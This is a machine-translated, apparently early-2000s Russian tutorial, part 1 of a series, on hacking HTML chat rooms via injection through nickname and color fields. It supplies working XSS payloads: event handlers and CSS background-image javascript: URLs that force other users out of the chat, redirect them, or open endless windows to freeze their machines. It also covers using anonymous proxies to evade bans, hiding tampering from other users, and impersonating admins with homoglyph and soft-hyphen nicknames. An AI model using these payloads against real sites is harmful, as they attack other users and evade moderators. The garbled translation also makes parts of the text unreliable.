This page has been robot translated, sorry for typos if any. Original content here.

Breaking Chat Part 1 (Theory and Practice)



  • Part 1
  • Part 2


  • This page does not in any way call for illegal activities, "cracking", etc. The main goal is to study the features of HTML and the prevention of errors associated with its use. For any illegal use of the information provided by the author is not responsible. About all detected errors in chat rooms, the administration of the chat rooms was informed by the author.
    All examples cited in the article have been tested and work in MSIE 5.50.4134.0600. I cannot guarantee the performance in other versions, but I am sure that almost all the examples will work there.

    Glossary

    Hacking through nick (handler without quotes)
    Hacking through the nickname (handler enclosed in quotes)
    Hacking through the nickname (the filter does not allow quotes / necessary characters)
    Breaking through color (attribute without quotes)
    Breaking through color (attribute with quotes)
    What characters need to check filters
    Handler limiters
    Fake nicks, empty nicks

    General theory

    Here I want to dwell on the basics of hacking chats. I apologize in advance to advanced readers - these methods have long been known and old as the world. If you are advanced enough, you can focus on the next chapters.

    First of all, I want to note that each chat is original and unique in its own way (with the exception of replicated copies of one tsishka, of course). Therefore, there are no absolutely universal ways of hacking. Almost every chat has features that need to be considered, and without which, stupid templates will not work.

    First of all, what do I actually understand by breaking into an HTML chat? This is not a trivial flood, and no attacks on IP chat. By hacking we mean an unauthorized change of the HTML document of the chat, or access to its hidden parts (for example, private), i.e. such an impact on the chat, which was not provided for and permitted to users. This equally applies not only to chat rooms, but also to forums, guest books, etc. (where all the described methods also work and even better, since these forms are protected, as a rule, worse than chats).

    All described applies only to HTML chat rooms. Breaking Java chats is a separate and completely different song. I hope you can distinguish one type of chat from another. :) ).

    So, we are on the verge of HTML chat. Suppose we want to test it for "strength." What to do first? First of all, we connect through an anonymous proxy (I hope you know what it is). This is necessary for two reasons: firstly, we ensure our anonymity (so that the administrator’s uncle doesn’t give ass), and secondly, if the admin still doesn’t like our experiments and he closes the window in our chat room, we could switch your proxy to other IP addresses and re-enter the chat. The truth here is one thing: the entrance to some chat rooms is not allowed through public proxies.

    Next, we need to find out what kind of weapon we have, that is, what attributes the user can specify. As a rule, in all chat rooms you can enter the user NICK, as well as the user COLOR. In addition, it is sometimes possible to set the user SOAP, its homepage, gender, the frequency of updating the chat, etc. In practice, fields such as color, nickname, soap, and the user's homepage are of interest. They are inserted directly into the body of the document, and therefore it is through them that you can attack the chat. It should be noted that in some chat rooms registration is required, and some of the attributes are set during registration, and some - just before entering the chat (or already inside the chat). Registration chats are usually more cool and better protected.

    > Denote the possible ways of hacking. First of all, let's focus sharply on the form code fragment in which the color of our messages is set (by the way, the color can be set separately for both the nickname and the text of the posts — both need to be checked, since they can be analyzed differently by chat). Why are we primarily interested in color? Because the color is indicated inside the tags, in their parameters, in contrast to, for example, the nickname, which most often appears in the body of the tags. And to break the chat, we need to get inside the tag parameters, so that we can change its attributes or insert our script (sometimes, of course, you can write any tags just in the text of messages, as it was until recently, chat.rambler. ru , but this option is so stupid that such chats probably no longer exist, and I do not consider it).

    We are interested in how the color information is sent to the server. The least protected string type is when the color is transmitted in the form of its own name. For example:

    <select name=youcolor style="width: 70px">
    <option value=blue>синий value=blue
    <option value=red>красный
    <option value=darkred>т-красный
    <option value=green>зеленый
    <option value=black>черный value=black
    <option value=lightblue>голубой value=lightblue
    </select>

    Such a chat usually breaks down to one degree or another. :) . A worse option if the color is returned in the form of a numerical code:

    <select name=youcolor style="width: 70px">
    <option value=#0000FF>синий value=#0000FF
    <option value=#AF0000>красный
    <option value=#FF0000>т-красный
    <option value=green>зеленый
    <option value=#000000>черный value=#000000
    <option value=#0000AF>голубой value=#0000AF
    </select>

    In such a chat, perhaps , there are filters on all characters except numbers, the # sign and the letters A, B, C, D, E and F. Then you will have to forget about breaking through the color.

    And finally, the worst case is when the color is transmitted simply as a number from the list of acceptable colors:

    <select name=youcolor style="width:70px">
    <option value=1>синий <
    <option value=2>красный <
    <option value=3>т-красный <
    <option value=4>зеленый <
    <option value=5>черный <
    <option value=6>голубой <
    </select>

    As a rule, it is impossible to crack such a chat through color (and often impossible at all). This is the most protected option (by the way, I recommend to developers of chat rooms).

    Next, we need to change the HTML code so that we can freely send arbitrary attribute values ​​to the server. To do this, we save the site on our disk and change the chat entry form (or registration) in the following way: we change the relative address of the action parameter of the form to the full address. Replace all hidden type tags with text type, and change select tags with input . In addition, you must remove the restrictions on the length of the input value (if any). For example, if the original form had the form:



    <form name="logon" method="POST" action="/cgi-bin/chat/chat.cgi">
    <table cellspacing="0" cellpadding="0">
    <tr>

    <td valign="middle">
    <small>Nickname:</small>
    <input type="text" name="username" size="12" maxlength="12" >
    </td>

    <td valign="middle"><small> TextColor:</small>
    <select name="color">

    <option selected value="black">black
    <option selected value="red">red
    <option selected value="blue">blue
    </select>

    </td>
    <td valign="middle">

    <small>
    <input type=submit value="Join Chat">
    </small>
    </td>

    <input type=hidden name=message value="logged on.">

    <input type=hidden name="logon" value="">
    <input type=hidden name=to value="Room">
    <input type=hidden name=frames value="yes">

    </td>
    </tr>
    </table>

    </form>


    Then after the corresponding replacements we get:



    <form name="logon" method="POST" action="http://typachat.ru/cgi-bin/chat/chat.cgi">

    <table cellspacing="0" cellpadding="0">
    <tr>

    <td valign="middle"><small>Nickname:</small>

    <input type="text" name="username" >

    </td>

    <td valign="middle"><small> Text Color:</small>

    <input name="color">

    <option selected value="black">black
    <option selected value="red">red
    <option selected value="blue">blue

    </select>

    </td>
    <td valign="middle">

    <small>
    <input type=submit value="Join Chat">
    </small>
    </td>

    <input type=text name=message value="logged on.">

    <input type=text name="logon" value="">

    <input type=text name=to value="Room">
    <input type=text name=frames value="yes">

    </td>
    </tr>
    </table>

    </form>


    Note that a document can be created dynamically through functions like document.write () , then, most likely, you will have to convert it to a static view. In addition, it often happens that after saving HTML to disk, the chat does not want to open. This may be due to the fact that the site was not completely saved if it consisted of frames. In this case, you need to more carefully understand the structure of the page and keep everything right. Another reason may be that the server tracks the referer field of the http request header, and detects that we are not logging on from its page. In this case, you need to use other methods, which we dwell on in the chapter "Hacking at the http level".

    Now we can experiment with chat. First of all, you need to find out what filters are on the input values ​​(first for color and nick). We are primarily interested in the following characters:

    " ' ` = < > ; \ & % пробел " ' ` = < > ; \ & % пробел " ' ` = < > ; \ & % пробел " ' ` = < > ; \ & % пробел " ' ` = < > ; \ & % пробел " ' ` = < > ; \ & % пробел " ' ` = < > ; \ & % пробел " ' ` = < > ; \ & % пробел " ' ` = < > ; \ & % пробел " ' ` = < > ; \ & % пробел " ' ` = < > ; \ & % пробел

    Enter them into the color field and nickname, go to the chat (if they let us in there with such attributes; if they don't let us have to sort through the characters one by one), and see which characters were skipped by the filter (by writing to the chat that a thread like "hello", and Having seen in the HTML text what symbols of color and nickname are present). Some chats simply remove filtered characters, some replace them with other characters, and some convert them into a coded form of type < or . Such transformed characters do not suit us, since HTML does not perceive them (however, for more details on this, see the chapter "A few more hacks of the long-suffering chat T").

    As a result, we should have a list of passed characters for each attribute of the registration form.

    Next, we are faced with the task of penetrating into any tag in order to change its pramatra or insert our own script there. There are two fundamentally different ways to do this: the first is that the code we need is transmitted through attributes that are already inside the tag (that is, between angle brackets) —for example, through the color or address of the soap. The second is to break the structure of the HTML code in such a way that the code we need is inside the tag. How to do this is determined from the analysis of the specific structure of the chat code and the set of unfiltered characters for our attributes. Various options for hacking consider the following examples. In the meantime, I would like to highlight some of the features of HTML that actually allow for producing interesting "effects."

    HTML features

    P> Here I am not going to give a lecture on HTML for dummies. I hope that you know what a tag and its parameters are, you are familiar with JavaScript and have written at least one web page in your life on HTML (and not in FrontPage).

    The biggest misfortune (and yet the power) of HTML is that it does not have a single standard. That is, it seems to be there, but the standards are so different, and there are so many of them intertwined in HTML that no one knows it thoroughly (and often does not know what it is). In addition, the competition among browsers and the heterogeneity of sites leads to the fact that browsers are trying to maintain the largest possible number of standards and technologies. Moreover, the lack of uniform standards led to the fact that webmasters even on one page manage to mix in different styles: o (. However, this is exactly what allows hackers to crack HTML, and gives developers a lot of headaches.

    A simple question: what are the delimiters in HTML and JavaScript? Even I can not immediately and unequivocally answer this question. Consider an example:

    <font onclick= "alert()">Text</font>

    Everything is clear and obvious here. There is a tag that has a click event handler written in JavaScript, the text of which is enclosed in double quotes. The fact that JavaScript is used can be specified explicitly:

    <font onclick="javascript:alert()">Text</font>

    The string delimiters in these examples are double quotes. However, you can do without them. Since after onclick = there can only be a static line-handler, HTML allows you to omit the quotes (this applies to many cases where the argument can only be a constant string). Thus, this design also works:

    <font onclick=alert()>Text</font>

    and now instead of an empty message, insert something meaningful:

    <font onclick=alert('Привет друзья!')>Text</font>

    Opening the demo link shows that this example is not working. The reason is this: the body of the handler can not be enclosed in quotes, but in this case, the first space is considered the end of the line-handler (even if the space itself is inside the quotes). Therefore, the browser considers only an alert fragment as the handler ('Hello , and finding an open quotation gives an error message. Why does the browser not respond to the fact that the space is inside the quotes? I think the reason is that two languages ​​are mixed here: HTML and JavaScript. The browser "saw" that after the = sign there is no quotation mark and therefore began to look for a space - as the end of the handler. At the moment, the handler’s interior was not interested in it, because it related not to HTML, but to JavaScript. Thus, he simply did not notice the opening quote. took the space behind the horse the value of the parameter. The following constructions work without errors:

    <font onclick="alert('Привет друзья!')">Text</font>
    <font onclick=alert('Привет_друзья!')>Text</font>
    <font onclick="alert('Привет друзья!')"onmouseover='alert()'>Text</font>
    <font color=alert('Привет друзья!')>Text</font>

    Note an important feature: if the value of the tag parameter is in quotes, then the space before the next parameter can be omitted (the third line of the example). The fourth line of the example also works (in the sense that the browser does not swear, but the script certainly does not work), because the browser does not consider the contents of the color attribute to be JavaScript, and therefore does not swear at an open quote, although only an alert (' Hi (arbitrary string can act as a color in HTML, in this case the browser converts the string into some numerical value which it considers as color).

    Are there any other characters - the handler's delimiters without quotes (except the space and the > character) - an open question. I do not know these, but I admit that they can be.

    As you can see from the examples, double and single quotes can be used as line terminators. This applies equally to both HTML and JavaScript, however, it turns out there is at least one more character that is a line terminator in HTML (but not in JavaScript!). This is the symbol of the reverse apostrophe ` (usually located on the same key with the letter Ё ). You can see the following example:

    <font onclick=`alert('Привет друзья!')`>Text</font>

    I swear that at least 90% of webmasters do not know about it! In any case, I have not yet seen that anyone would apply the reverse apostrophe. This symbol is a find for a hacker. :) ).

    It often happens that it is necessary to use inside some quotes - others. And this is difficult, especially if the chat misses only one kind of quotes. But it turns out that JavaScript allows you to insert string constants inside other string constants, while still using the same quotes! For example:

    'javascript:st='Фиг вам';document.oncontextmenu=new Function('event.returnValue=alert(st)*0')'

    The example uses nested single quotes, but the interpreter does not produce an error. I note that the contents of internal quotes are not arbitrary: there should not be spaces, and at the end some characters are not allowed, for example ; or ) .

    Now let's talk about links. First of all, it is necessary to note such a detail: the development of the Internet took place in such a way that completely different technologies were mixed in it. Access to information can occur through a large number of different protocols. Therefore, when specifying the full path of the document (URL), it is allowed to specify any protocol familiar to the browser. It is noteworthy that javascript is also related to protocols (although it is not, but apparently the developers decided that it would be too bold to allocate a separate concept for scripts, and added them to protocols). Therefore, wherever in the HTML document, you can specify the URL, you can insert the script. And this script will be executed as soon as the user (or the browser itself) requests this link. For example:

    <a href=javascript:alert()>Text</a>

    Interestingly, in addition to operators, in a link to JavaScript you can simply specify a string (or numeric) value (but always after the operators, if any). When you click on such a link, the browser will first execute the leading operators, and then open a new document and put the value of the last line specified in the link:

    <a href=javascript:alert();'Hello!!'>Text</a> I <a href=javascript:alert();'Hello!!'>Text</a> note that tags cannot be inserted in this way into a new page.

    Breaking chat R

    I will give an example of one of the first chats I hacked. This chat was very simple, and cracked what is called from the first entry :) ).

    Yes, and now there are few chats in which it passes. Although I thought of these methods myself, but then I found them in hacker journals.

    The input form of this chat corresponded exactly to the form given in the chapter “General Theory”. After converting and saving the form to disk, I checked which characters in the color attribute pass. It turned out that the following symbols pass (from those that interest us, see the chapter "General Theory"):

    ' ` = ; % пробел ' ` = ; % пробел ' ` = ; % пробел ' ` = ; % пробел ' ` = ; % пробел ' ` = ; % пробел ' ` = ; % пробел ' ` = ; % пробел ' ` = ; % пробел

    And of course, all the numbers and letters passed. The length of the line is the color value is not limited. Next, I looked exactly where the color is inserted in the message frame. Here is a fragment of this frame:

    <font color=Black><b>Путник</b>- Alpha, привет ))</font>
    <font color=Red><b>Alpha</b>- Всемприветик !!</font>

    As you can see, the color is inserted without surrounding quotes. It suited me. I logged in under Shram's nickname (or almost under that nickname;)) and in red size = 20 . My message was as follows:

    <font color=red size=20><b>Algol</b>- Hi</font>

    It was displayed in a very large font, which a little surprised the chat population. :) ).

    Thus, although we cannot insert tags directly, but permission to enter a space in the color attribute allowed us to set unauthorized tag parameters. However, this was certainly not enough for me. Changing the font size is certainly cool, but really something useful can only be done using scripts. I could not insert the script tag directly (or rather, at that time I did not know how to do it). But I could specify a handler for any event tag. Here is the color I asked for in order to remove some idiot from the chat:
    #A0A000 onmouseover=parent.frames[2].forms[0].ExitChat.click() size=30. And then sent him a long long message in private. I picked up the color of the message in such a way that it would not differ from the background color. And the font size and length of the message were so huge that the victim probably at least once passed the mouse over the message, as a result of which my onmouseover handler pressed the "leave chat" button instead of the user :) ).

    However, gradually there were clever men who got to the joke, and deliberately did not drag the cursor over the chat window. My script did not always work :( (At first, I thought that there was no way out. Since I can only insert the script as an event handler, then if this event does not occur, then the script does not work. But, having rummaged through the "annals", I found a solution (now it has become trivial and widely known.) It turned out that you can specify the URL of the background image for the tag in the style attribute. And where you can specify the URL, you can also write a script there. And the main thing is that the background image itself was loaded after the HTML document was finished loading! If I wanted show alert to chat participants, I logged in with the following color by this:

    style=background-image:url(javascript:alert('приветик_всем_!!'));

    An important detail should be noted: since the structure of most HTML chats is such that the page is regularly updated, the script sent in this way is executed not once, but a lot, until our message disappears from the screen.

    And here is what the color attribute values ​​for throwing out of the chat now looked like:

    style=background-image:url(javascript:parent.frames[2].forms[0].ExitChat.click());

    It must be remembered: the script sent in private will see not only your “interlocutor”, but also you yourself, therefore you need to know how to protect yourself from the influence of the script yourself. This can be done in two ways: either put yourself in the ignore (and then we will not see our own messages), or in the browser settings to prevent the display of pictures. Then the script triggered through the background image will not work.

    Now I want to show some useful scripts that can be used in hacked chats:

    javascript: navigate ('http://myserver.ru'); - loads the site myserver.ru into the current frame (or page).
    Some chats, at the sight of the http: // fragment, consider this a link, and automatically insert the <a> tag. Since this will destroy our script, this should not be allowed. To do this, simply omit the http: prefix (which is already accepted by default). Then the script will look like: javascript: navigate ('// myserver.ru'); .Two ahead of the slash - are required.

    javascript: parent.frames [2] .document.location = 'http: //myserver.ru' - loads the site myserver.ru into one of the frames.

    javascript: for (;;) open () - opens an infinite number of windows (if you do not navigate in time, it causes the machine to freeze and then reboot).

    javascript: document.write ('<script> alert () </ script>') - replaces the current frame with a script that is then executed. Note: if chatne misses the characters <and> (and this is the overwhelming number of chats) then we will not be able to insert such a script. But there is a way out. This is an application of the unescape () function, which converts the ASCII code of a character to a character. Replace the angle brackets with the unescape () function with the corresponding codes, then our script will look like this:

    javascript:document.write(unescape('%3C')+'script'+unescape('%3E')+'alert()'+unescape('%3C')+'/script'+unescape('%3E')) javascript:this.insertBefore(e=document.createElement('IMG'));e.src='demo.jpg' - inserts a picture after the text. I note that in IE 5.x you can insert any tag except FRAME, IFRAME and SELECT.

    But in IE 4.x, the createElement () function only allows the insertion of IMG , AREA, and OPTION tags. I do not have information about Netscape, you can experiment yourself. 'javascript:st='Фиг вам';document.oncontextmenu=new Function('event.returnValue=alert(st)*0')' / * blocks the dropdown menu of the page, and therefore makes it impossible to view the HTML content of the frame. Thanks to this, you can hide your frauds with the chat body. :) ). * / Sometimes it is useful to login under someone else's nickname. Chats with the user registration system will not allow you to do this if you do not know the password (and you most likely do not know it). Banal way out: registration with a nickname in which the letter of the Latin alphabet is replaced by a very similar letter of the Russian layout. For example, log in as the admin nickname where the Latin letter a is replaced with Russian and . The method is primitive, but it works)). There are also more severe cases. For example, in some chats it is prohibited to use symbols from different layouts in one nickname. Then the inquiring mind has nothing to do, as it turns to Uncle Gates for help. And here she is human kindness, Microsoft has not forgotten about sinful users and presented us with a symbol ­ (he ­ aka % AD ), which the microsoft itself called "Soft hyphen" ("Short hyphen"). It really looks like a hyphen in Word, and in Excel too, and even in a notebook, but not in IE! For Microsoft's Microsoft Exxplorer ­ it simply does not exist, that is, it seems to be there, but they forgot to make a graphic representation for it. It simply simply does not appear in the HTML page! Thus, by adding a short hyphen to any nickname and registering under it, we enter the chat with a nickname that will look on the HTML page in the same way as a nickname without a hyphen. And you can make it even steeper - log in under a nickname, consisting only of the characters of a short hyphen. Then your nickname will not be displayed in the chat at all, absolutely empty space)).

    (Note: Having scooped a little more with the short hyphen character, I still found cases when it appears: It appears only as a hyphenation symbol. That is, if there is a short hyphen inside the word and if this word is at the end of the line, then part of the word after the hyphen can be moved to the next line, and the hyphen itself becomes visible! Thus, the invisibility of the hyphen is probably a deliberate feature of Microsoft (which, incidentally, does not diminish its usefulness when cracking :) ). The truth is it is not clear why it still remains always visible in other applications?)



    Next 2h. >>